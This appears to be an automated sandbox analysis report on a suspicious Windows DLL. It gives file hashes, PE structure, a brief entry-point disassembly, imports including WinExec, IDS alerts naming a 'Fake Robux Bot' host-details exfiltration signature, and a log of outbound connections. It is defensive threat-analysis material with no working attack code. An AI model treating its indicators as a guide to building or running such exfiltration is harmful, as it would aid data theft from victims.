                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                File type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                Entropy (8bit):5.96940685690436
                                                                TrID:
                                                                • Win64 Dynamic Link Library (generic) (102004/3) 86.43%
                                                                • Win64 Executable (generic) (12005/4) 10.17%
                                                                • Generic Win/DOS Executable (2004/3) 1.70%
                                                                • DOS Executable Generic (2002/1) 1.70%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.01%
                                                                File name:5UIy3bo46y.dll
                                                                File size:112'128 bytes
                                                                MD5:674fb5fd30f3b299608e7d439f1bd3e7
                                                                SHA1:b3dabd98de642f0611b7d10f9602375f31b28f1b
                                                                SHA256:0b9acce9a60dda0df4fdc61eb954433a5bff023ab04e38aca2c2f18aad70c3f3
                                                                SHA512:4b3660d4f2573fca80d9a1ae03a9f9e6f2fff442129883d4bf940b9a2c7989b0c41f34b89aacf0ec7f1360c1b2883999cfa2570221c14928c3065085f5d3b4c3
                                                                SSDEEP:3072:UtJPYfAUwG1bIaNgByg1jCgH4F1WsBeMflwl:EYfAtG1bIaOQsm24bWOwl
                                                                TLSH:17B35A4B62A504FBF1368378C8A34E45E7B6B8150760AF6F07A4435A1F63BD18D3EB61
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'LY.c-7.c-7.c-7.(U4.f-7.(U2..-7.(U3.i-7.c-7.b-7...2.F-7...3.m-7...4.r-7.(U6.`-7.c-6.9-7...>.a-7...7.b-7.....b-7...5.b-7.Richc-7
                                                                Icon Hash:7ae282899bbab082
                                                                Entrypoint:0x1800013fc
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x180000000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, DLL
                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                                                                Time Stamp:0x66BA1D6A [Mon Aug 12 14:34:18 2024 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:6
                                                                OS Version Minor:0
                                                                File Version Major:6
                                                                File Version Minor:0
                                                                Subsystem Version Major:6
                                                                Subsystem Version Minor:0
                                                                Import Hash:3b33a0fd02e658d9e1cdca7d0fcc3364
                                                                Instruction
                                                                dec eax
                                                                mov dword ptr [esp+08h], ebx
                                                                dec eax
                                                                mov dword ptr [esp+10h], esi
                                                                push edi
                                                                dec eax
                                                                sub esp, 20h
                                                                dec ecx
                                                                mov edi, eax
                                                                mov ebx, edx
                                                                dec eax
                                                                mov esi, ecx
                                                                cmp edx, 01h
                                                                jne 00007F5A2C876D97h
                                                                call 00007F5A2C877094h
                                                                dec esp
                                                                mov eax, edi
                                                                mov edx, ebx
                                                                dec eax
                                                                mov ecx, esi
                                                                dec eax
                                                                mov ebx, dword ptr [esp+30h]
                                                                dec eax
                                                                mov esi, dword ptr [esp+38h]
                                                                dec eax
                                                                add esp, 20h
                                                                pop edi
                                                                jmp 00007F5A2C876C24h
                                                                int3
                                                                int3
                                                                int3
                                                                inc eax
                                                                push ebx
                                                                dec eax
                                                                sub esp, 20h
                                                                dec eax
                                                                mov ebx, ecx
                                                                xor ecx, ecx
                                                                call dword ptr [0000EBE3h]
                                                                dec eax
                                                                mov ecx, ebx
                                                                call dword ptr [0000EBD2h]
                                                                call dword ptr [0000EBDCh]
                                                                dec eax
                                                                mov ecx, eax
                                                                mov edx, C0000409h
                                                                dec eax
                                                                add esp, 20h
                                                                pop ebx
                                                                dec eax
                                                                jmp dword ptr [0000EBD0h]
                                                                dec eax
                                                                mov dword ptr [esp+08h], ecx
                                                                dec eax
                                                                sub esp, 38h
                                                                mov ecx, 00000017h
                                                                call dword ptr [0000EBC4h]
                                                                test eax, eax
                                                                je 00007F5A2C876D99h
                                                                mov ecx, 00000002h
                                                                int 29h
                                                                dec eax
                                                                lea ecx, dword ptr [0001970Ah]
                                                                call 00007F5A2C876F5Eh
                                                                dec eax
                                                                mov eax, dword ptr [esp+38h]
                                                                dec eax
                                                                mov dword ptr [000197F1h], eax
                                                                dec eax
                                                                lea eax, dword ptr [esp+38h]
                                                                dec eax
                                                                add eax, 08h
                                                                dec eax
                                                                mov dword ptr [00019781h], eax
                                                                dec eax
                                                                mov eax, dword ptr [000197DAh]
                                                                dec eax
                                                                mov dword ptr [0001964Bh], eax
                                                                Name | Virtual Address | Virtual Size | Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x19370 | 0x58 | .rdata
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x193c8 | 0x28 | .rdata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1f000 | 0xf8 | .rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x1c000 | 0x1050 | .pdata
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x20000 | 0x664 | .reloc
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x17a50 | 0x70 | .rdata
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x17910 | 0x140 | .rdata
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_IAT | 0x10000 | 0x250 | .rdata
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xeb00 | 0xec00 | 9fe23eb43cbcad6cabdf9eafbecd6cc8 | False | 0.5630958686440678 | data | 6.484254393647746 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x10000 | 0x9b88 | 0x9c00 | 4a209a1ae41be4b05e33747182ca5f9b | False | 0.4267077323717949 | data | 4.69922142453641 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x1a000 | 0x1ca8 | 0xc00 | af46192a71fd8a69989b5851533731e7 | False | 0.14225260416666666 | data | 2.0418830550419096 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata | 0x1c000 | 0x1050 | 0x1200 | f0cce2aebb958d7285860ee3522105aa | False | 0.4320746527777778 | data | 4.53353806453801 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
_RDATA | 0x1e000 | 0x1f4 | 0x200 | 4ab83cc1ce28301b416d0dd0254e20a6 | False | 0.5234375 | data | 3.7086617662342007 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x1f000 | 0xf8 | 0x200 | ca220b4e602307c00e829209b4722123 | False | 0.3359375 | data | 2.5249599901333757 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x20000 | 0x664 | 0x800 | 37e12b9713770c777edb6bf775fef47a | False | 0.4990234375 | data | 4.880231318845951 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x1f060 | 0x91 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.8689655172413793
DLL | Import
KERNEL32.dll | WinExec, WriteConsoleW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwindEx, InterlockedFlushSList, RtlPcToFileHeader, RaiseException, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, EncodePointer, ExitProcess, GetModuleHandleExW, GetModuleFileNameW, HeapAlloc, HeapFree, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, LCMapStringW, GetProcessHeap, GetStdHandle, GetFileType, GetStringTypeW, HeapSize, HeapReAlloc, SetStdHandle, FlushFileBuffers, WriteFile, GetConsoleOutputCP, GetConsoleMode, SetFilePointerEx, CreateFileW, CloseHandle
Name | Ordinal | Address
DllRegisterServer | 1 | 0x180001000

Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-15T16:00:28.799240+0200 | 2857659 | ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil | 1 | 192.168.2.7 | 52050 | 162.159.128.233 | 443 | TCP
2024-10-15T16:00:28.800110+0200 | 2857659 | ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil | 1 | 192.168.2.7 | 52049 | 162.159.128.233 | 443 | TCP
2024-10-15T16:00:38.975597+0200 | 2857659 | ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil | 1 | 192.168.2.7 | 52102 | 162.159.128.233 | 443 | TCP
2024-10-15T16:00:39.025748+0200 | 2857659 | ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil | 1 | 192.168.2.7 | 52104 | 162.159.128.233 | 443 | TCP
2024-10-15T16:00:56.974316+0200 | 2857659 | ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil | 1 | 192.168.2.7 | 52203 | 162.159.128.233 | 443 | TCP
2024-10-15T16:01:03.495587+0200 | 2857659 | ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil | 1 | 192.168.2.7 | 52206 | 162.159.128.233 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 15, 2024 16:00:10.466571093 CEST | 49743 | 80 | 192.168.2.7 | 104.18.111.161
Oct 15, 2024 16:00:10.467437983 CEST | 49744 | 80 | 192.168.2.7 | 104.18.111.161
Oct 15, 2024 16:00:10.471452951 CEST | 80 | 49743 | 104.18.111.161 | 192.168.2.7
Oct 15, 2024 16:00:10.472038984 CEST | 49743 | 80 | 192.168.2.7 | 104.18.111.161
Oct 15, 2024 16:00:10.472265959 CEST | 80 | 49744 | 104.18.111.161 | 192.168.2.7
Oct 15, 2024 16:00:10.472702980 CEST | 49744 | 80 | 192.168.2.7 | 104.18.111.161
Oct 15, 2024 16:00:10.479126930 CEST | 49744 | 80 | 192.168.2.7 | 104.18.111.161
Oct 15, 2024 16:00:10.481404066 CEST | 49743 | 80 | 192.168.2.7 | 104.18.111.161
Oct 15, 2024 16:00:10.483892918 CEST | 80 | 49744 | 104.18.111.161 | 192.168.2.7
Oct 15, 2024 16:00:10.486316919 CEST | 80 | 49743 | 104.18.111.161 | 192.168.2.7
Oct 15, 2024 16:00:10.489725113 CEST | 49745 | 80 | 192.168.2.7 | 104.18.111.161
Oct 15, 2024 16:00:10.494658947 CEST | 80 | 49745 | 104.18.111.161 | 192.168.2.7
Oct 15, 2024 16:00:10.494725943 CEST | 49745 | 80 | 192.168.2.7 | 104.18.111.161
Oct 15, 2024 16:00:10.496746063 CEST | 49745 | 80 | 192.168.2.7 | 104.18.111.161
Oct 15, 2024 16:00:10.501631975 CEST | 80 | 49745 | 104.18.111.161 | 192.168.2.7
Oct 15, 2024 16:00:10.507976055 CEST | 49746 | 80 | 192.168.2.7 | 104.18.111.161
Oct 15, 2024 16:00:10.513079882 CEST | 80 | 49746 | 104.18.111.161 | 192.168.2.7
Oct 15, 2024 16:00:10.513154030 CEST | 49746 | 80 | 192.168.2.7 | 104.18.111.161
Oct 15, 2024 16:00:10.515091896 CEST | 49746 | 80 | 192.168.2.7 | 104.18.111.161
Oct 15, 2024 16:00:10.520210981 CEST | 80 | 49746 | 104.18.111.161 | 192.168.2.7
Oct 15, 2024 16:00:11.103497982 CEST | 80 | 49744 | 104.18.111.161 | 192.168.2.7
Oct 15, 2024 16:00:11.103718042 CEST | 80 | 49744 | 104.18.111.161 | 192.168.2.7
Oct 15, 2024 16:00:11.104132891 CEST | 49744 | 80 | 192.168.2.7 | 104.18.111.161
Oct 15, 2024 16:00:11.113112926 CEST | 80 | 49743 | 104.18.111.161 | 192.168.2.7
Oct 15, 2024 16:00:11.113164902 CEST | 80 | 49743 | 104.18.111.161 | 192.168.2.7
Oct 15, 2024 16:00:11.113174915 CEST | 80 | 49743 | 104.18.111.161 | 192.168.2.7
Oct 15, 2024 16:00:11.113220930 CEST | 49743 | 80 | 192.168.2.7 | 104.18.111.161
Oct 15, 2024 16:00:11.122750998 CEST | 49752 | 443 | 192.168.2.7 | 104.20.3.235
Oct 15, 2024 16:00:11.122767925 CEST | 443 | 49752 | 104.20.3.235 | 192.168.2.7
Oct 15, 2024 16:00:11.122798920 CEST | 49753 | 443 | 192.168.2.7 | 104.20.3.235
Oct 15, 2024 16:00:11.122812033 CEST | 443 | 49753 | 104.20.3.235 | 192.168.2.7
Oct 15, 2024 16:00:11.122833967 CEST | 49752 | 443 | 192.168.2.7 | 104.20.3.235
Oct 15, 2024 16:00:11.122903109 CEST | 49753 | 443 | 192.168.2.7 | 104.20.3.235
Oct 15, 2024 16:00:11.131637096 CEST | 49752 | 443 | 192.168.2.7 | 104.20.3.235
Oct 15, 2024 16:00:11.131643057 CEST | 49753 | 443 | 192.168.2.7 | 104.20.3.235
Oct 15, 2024 16:00:11.131653070 CEST | 443 | 49752 | 104.20.3.235 | 192.168.2.7
Oct 15, 2024 16:00:11.131659031 CEST | 443 | 49753 | 104.20.3.235 | 192.168.2.7
Oct 15, 2024 16:00:11.132302999 CEST | 80 | 49745 | 104.18.111.161 | 192.168.2.7
Oct 15, 2024 16:00:11.132322073 CEST | 80 | 49745 | 104.18.111.161 | 192.168.2.7
Oct 15, 2024 16:00:11.132375956 CEST | 49745 | 80 | 192.168.2.7 | 104.18.111.161
Oct 15, 2024 16:00:11.134619951 CEST | 49754 | 443 | 192.168.2.7 | 104.20.3.235
Oct 15, 2024 16:00:11.134633064 CEST | 443 | 49754 | 104.20.3.235 | 192.168.2.7
Oct 15, 2024 16:00:11.134776115 CEST | 49754 | 443 | 192.168.2.7 | 104.20.3.235
Oct 15, 2024 16:00:11.137012005 CEST | 49754 | 443 | 192.168.2.7 | 104.20.3.235
Oct 15, 2024 16:00:11.137021065 CEST | 443 | 49754 | 104.20.3.235 | 192.168.2.7
Oct 15, 2024 16:00:11.166562080 CEST | 80 | 49746 | 104.18.111.161 | 192.168.2.7
Oct 15, 2024 16:00:11.166600943 CEST | 80 | 49746 | 104.18.111.161 | 192.168.2.7
Oct 15, 2024 16:00:11.166610956 CEST | 80 | 49746 | 104.18.111.161 | 192.168.2.7
Oct 15, 2024 16:00:11.166652918 CEST | 49746 | 80 | 192.168.2.7 | 104.18.111.161
Oct 15, 2024 16:00:11.169277906 CEST | 49755 | 443 | 192.168.2.7 | 104.20.3.235
Oct 15, 2024 16:00:11.169331074 CEST | 443 | 49755 | 104.20.3.235 | 192.168.2.7
Oct 15, 2024 16:00:11.169435978 CEST | 49755 | 443 | 192.168.2.7 | 104.20.3.235
Oct 15, 2024 16:00:11.171886921 CEST | 49755 | 443 | 192.168.2.7 | 104.20.3.235
Oct 15, 2024 16:00:11.171910048 CEST | 443 | 49755 | 104.20.3.235 | 192.168.2.7
Oct 15, 2024 16:00:11.765945911 CEST | 443 | 49754 | 104.20.3.235 | 192.168.2.7
Oct 15, 2024 16:00:11.766026974 CEST | 49754 | 443 | 192.168.2.7 | 104.20.3.235
Oct 15, 2024 16:00:11.766344070 CEST | 443 | 49752 | 104.20.3.235 | 192.168.2.7
Oct 15, 2024 16:00:11.766407967 CEST | 49752 | 443 | 192.168.2.7 | 104.20.3.235
Oct 15, 2024 16:00:11.767178059 CEST | 443 | 49753 | 104.20.3.235 | 192.168.2.7
Oct 15, 2024 16:00:11.767407894 CEST | 49753 | 443 | 192.168.2.7 | 104.20.3.235
Oct 15, 2024 16:00:11.769592047 CEST | 49754 | 443 | 192.168.2.7 | 104.20.3.235
Oct 15, 2024 16:00:11.769606113 CEST | 443 | 49754 | 104.20.3.235 | 192.168.2.7
Oct 15, 2024 16:00:11.769670963 CEST | 49753 | 443 | 192.168.2.7 | 104.20.3.235
Oct 15, 2024 16:00:11.769675016 CEST | 443 | 49753 | 104.20.3.235 | 192.168.2.7
Oct 15, 2024 16:00:11.769884109 CEST | 443 | 49754 | 104.20.3.235 | 192.168.2.7
Oct 15, 2024 16:00:11.769903898 CEST | 443 | 49753 | 104.20.3.235 | 192.168.2.7
Oct 15, 2024 16:00:11.770742893 CEST | 49752 | 443 | 192.168.2.7 | 104.20.3.235
Oct 15, 2024 16:00:11.770764112 CEST | 443 | 49752 | 104.20.3.235 | 192.168.2.7
Oct 15, 2024 16:00:11.771174908 CEST | 443 | 49752 | 104.20.3.235 | 192.168.2.7
Oct 15, 2024 16:00:11.776427984 CEST | 49753 | 443 | 192.168.2.7 | 104.20.3.235
Oct 15, 2024 16:00:11.778384924 CEST | 49754 | 443 | 192.168.2.7 | 104.20.3.235
Oct 15, 2024 16:00:11.782897949 CEST | 49752 | 443 | 192.168.2.7 | 104.20.3.235
Oct 15, 2024 16:00:11.796600103 CEST | 443 | 49755 | 104.20.3.235 | 192.168.2.7
Oct 15, 2024 16:00:11.796678066 CEST | 49755 | 443 | 192.168.2.7 | 104.20.3.235
Oct 15, 2024 16:00:11.798358917 CEST | 49755 | 443 | 192.168.2.7 | 104.20.3.235
Oct 15, 2024 16:00:11.798382044 CEST | 443 | 49755 | 104.20.3.235 | 192.168.2.7
Oct 15, 2024 16:00:11.798779964 CEST | 443 | 49755 | 104.20.3.235 | 192.168.2.7
Oct 15, 2024 16:00:11.804780960 CEST | 49755 | 443 | 192.168.2.7 | 104.20.3.235
Oct 15, 2024 16:00:11.819401979 CEST | 443 | 49754 | 104.20.3.235 | 192.168.2.7
Oct 15, 2024 16:00:11.819415092 CEST | 443 | 49753 | 104.20.3.235 | 192.168.2.7
Oct 15, 2024 16:00:11.823414087 CEST | 443 | 49752 | 104.20.3.235 | 192.168.2.7
Oct 15, 2024 16:00:11.847419977 CEST | 443 | 49755 | 104.20.3.235 | 192.168.2.7
Oct 15, 2024 16:00:12.172533989 CEST | 443 | 49754 | 104.20.3.235 | 192.168.2.7
Oct 15, 2024 16:00:12.172619104 CEST | 443 | 49754 | 104.20.3.235 | 192.168.2.7
Oct 15, 2024 16:00:12.172743082 CEST | 443 | 49752 | 104.20.3.235 | 192.168.2.7
Oct 15, 2024 16:00:12.172832012 CEST | 49754 | 443 | 192.168.2.7 | 104.20.3.235
Oct 15, 2024 16:00:12.172878981 CEST | 443 | 49755 | 104.20.3.235 | 192.168.2.7
Oct 15, 2024 16:00:12.172907114 CEST | 443 | 49752 | 104.20.3.235 | 192.168.2.7
Oct 15, 2024 16:00:12.172972918 CEST | 443 | 49755 | 104.20.3.235 | 192.168.2.7
Oct 15, 2024 16:00:12.173017979 CEST | 49755 | 443 | 192.168.2.7 | 104.20.3.235
Oct 15, 2024 16:00:12.173017979 CEST | 49752 | 443 | 192.168.2.7 | 104.20.3.235
Oct 15, 2024 16:00:12.173660994 CEST | 443 | 49753 | 104.20.3.235 | 192.168.2.7
Oct 15, 2024 16:00:12.173739910 CEST | 443 | 49753 | 104.20.3.235 | 192.168.2.7
Oct 15, 2024 16:00:12.173815012 CEST | 49753 | 443 | 192.168.2.7 | 104.20.3.235
Oct 15, 2024 16:00:12.197412014 CEST | 49752 | 443 | 192.168.2.7 | 104.20.3.235
Oct 15, 2024 16:00:12.199444056 CEST | 49754 | 443 | 192.168.2.7 | 104.20.3.235
Oct 15, 2024 16:00:12.204463005 CEST | 49753 | 443 | 192.168.2.7 | 104.20.3.235
Oct 15, 2024 16:00:12.206171989 CEST | 49755 | 443 | 192.168.2.7 | 104.20.3.235
Oct 15, 2024 16:00:12.240525961 CEST | 49759 | 80 | 192.168.2.7 | 185.199.109.133
Oct 15, 2024 16:00:12.240643024 CEST | 49760 | 80 | 192.168.2.7 | 185.199.109.133
Oct 15, 2024 16:00:12.240993023 CEST | 49761 | 80 | 192.168.2.7 | 185.199.109.133
Oct 15, 2024 16:00:12.241271973 CEST | 49762 | 80 | 192.168.2.7 | 185.199.109.133
Oct 15, 2024 16:00:12.245584011 CEST | 80 | 49759 | 185.199.109.133 | 192.168.2.7
Oct 15, 2024 16:00:12.245615959 CEST | 80 | 49760 | 185.199.109.133 | 192.168.2.7
Oct 15, 2024 16:00:12.245688915 CEST | 49759 | 80 | 192.168.2.7 | 185.199.109.133
